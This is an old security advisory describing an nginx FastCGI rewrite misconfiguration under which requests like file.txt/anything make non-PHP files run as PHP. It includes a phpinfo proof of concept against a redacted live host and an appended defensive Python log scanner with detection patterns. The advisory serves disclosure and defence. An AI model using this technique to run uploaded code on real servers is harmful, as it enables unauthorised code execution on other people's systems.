Another wrong configuration (non-default) found by: Ev1lut10n

===========================
Special thanks to: Flyff666, Danzel, X-hack, Whitehat, P4, wenkhairu, badwolves, superman, cakill, ketek and all Chinese and Indonesians and all my bro
===========================
Yep, this is another configuration that triggers a hole. What I've found is a bit different from the one from 80sec (http://www.80sec.com/nginx-securit.html).
For a fastcgi setting in nginx.conf like this (just an example):

============
fastcgi_param SCRIPT_FILENAME /home/any_user/public_html$fastcgi_script_name;
if (!-e $request_filename) {
    rewrite ^(.+)$ /index.php?q=$1 last;
}
=========== 
where /home/any_user/public_html can be any path. The above setting is a non-default nginx configuration.

Any file requested in the form file.extension/any_string will be treated just like a PHP script,
ex: test.txt/any_string_without_php_extension

As an example, here we have a text file in /home/user/www:

==========================
root@host [/home/any_user_and_path/www]# cat tes.txt

<?php phpinfo();?>


====================

 
where any request for that tes.txt like this:
==============================
http://domain.com/tes.txt/any_string_without_php_extension 
=============================
will be treated as a PHP script.

OK, http://www.80sec.com/nginx-securit.html suggests a patch in nginx.conf or in php.ini.
In nginx.conf by adding:
if ( $fastcgi_script_name ~ \..*\/.*php ) {
    return 403;
}
or in php.ini by setting cgi.fix_pathinfo=0
Unfortunately, this will not fix your hole when you have the wrong config above. As I've checked, it is still treated as a PHP script:





===========

root@host [/usr/local/nginx/conf]# cat /usr/local/lib/php.ini | grep cgi.fix_pathinfo
; cgi.fix_pathinfo provides *real* PATH_INFO/PATH_TRANSLATED support for CGI.  PHP's
cgi.fix_pathinfo=0
root@host [/usr/local/nginx/conf]# /etc/init.d/httpd restart
Restarting nginx daemon: nginxRemaining processes: 12091
root@host [/usr/local/nginx/conf]# wget http://***********.net/tes.jpg/any_string_without_extension
--08:35:00--  http://***********.net/tes.jpg/any_string_without_extension
           => `any_string_without_extension'
Resolving ***********.net... 204.197.248.127
Connecting to ***********.net|204.197.248.127|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]

    [ <=>                                   ] 46,064        --.--K/s

08:35:03 (9.38 MB/s) - `any_string_without_extension' saved [46064]
root@host [/usr/local/nginx/conf]# cat any_string_without_extension | grep 'PHP Version'
<a href="http://www.php.net/"><img border="0" src="/tes.jpg?=PHPE9568F34-D428-11d2-A769-00AA001ACF42" alt="PHP Logo" /></a><h1 class="p">PHP Version 5.2.17</h1>
root@host [/usr/local/nginx/conf]# cat any_string_without_extension | grep 'safe_mode'
<tr><td class="e">safe_mode</td><td class="v">On</td><td class="v">On</td></tr>
<tr><td class="e">safe_mode_exec_dir</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
<tr><td class="e">safe_mode_gid</td><td class="v">On</td><td class="v">On</td></tr>
<tr><td class="e">safe_mode_include_dir</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
<tr><td class="e">sql.safe_mode</td><td class="v">Off</td><td class="v">Off</td></tr>
<tr><td class="e">safe_mode_allowed_env_vars</td><td class="v">PHP_</td><td class="v">PHP_</td></tr>
<tr><td class="e">safe_mode_protected_env_vars</td><td class="v">LD_LIBRARY_PATH</td><td class="v">LD_LIBRARY_PATH</td></tr>
root@host [/usr/local/nginx/conf]#
=================================================

(Trust me, you must be very careful when you're setting up nginx and fastcgi!! A little mistake in the config will trigger a hole on your server.)
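
Added example (not part of the original advisory, and not the author's code): a log check a defender can run to find requests of the shape described above, a static-looking file name followed by an extra path segment, that were answered with 200. It also reports whether the 80sec filter quoted above would have matched the path. The extension list, the combined log format and the sample lines are assumptions.

```python
import re

# Assumed list of extensions that should never reach the PHP interpreter.
STATIC_EXT = ("txt", "jpg", "jpeg", "png", "gif", "css", "js", "ico", "pdf")

# Request and status fields of a combined-format access log line.
LOG_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3}) ')
# A static-looking path segment followed by at least one more segment.
TRAIL_RE = re.compile(r"/[^/]+\.(?:%s)/.+" % "|".join(STATIC_EXT), re.I)
# The 80sec filter quoted in the advisory, applied here to the URI path.
FILTER_RE = re.compile(r"\..*/.*php")


def classify(line):
    """Return (path, label) for a 200 response worth reviewing, else None."""
    m = LOG_RE.search(line)
    if not m or m.group("status") != "200":
        return None  # 403/404 means the request was refused or not found
    path = m.group("uri").split("?", 1)[0]  # ignore the query string
    if not TRAIL_RE.search(path):
        return None
    if FILTER_RE.search(path):
        return (path, "matches 80sec filter, yet answered 200")
    return (path, "no 'php' after the slash: 80sec filter would not match")


def scan(lines):
    """Classify every line and keep only the findings."""
    return [hit for hit in map(classify, lines) if hit]


# Constructed sample log lines (documentation IP range, made-up sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2011:08:35:00 +0000] "GET /tes.jpg/any_string_without_extension HTTP/1.0" 200 46064 "-" "Wget"',
    '192.0.2.11 - - [01/Jan/2011:08:36:10 +0000] "GET /tes.jpg/x.php HTTP/1.1" 403 162 "-" "-"',
    '192.0.2.12 - - [01/Jan/2011:08:37:42 +0000] "GET /up/a.gif/b.php HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.13 - - [01/Jan/2011:08:38:05 +0000] "GET /static/app.js HTTP/1.1" 200 1024 "-" "-"',
    '192.0.2.14 - - [01/Jan/2011:08:39:30 +0000] "GET /index.php?q=/a.txt/b HTTP/1.1" 200 900 "-" "-"',
]

if __name__ == "__main__":
    for path, label in scan(SAMPLE_LOG):
        print(path, "->", label)
```

A hit is a candidate for review, not proof of execution: compare the response size and content type with the static file itself.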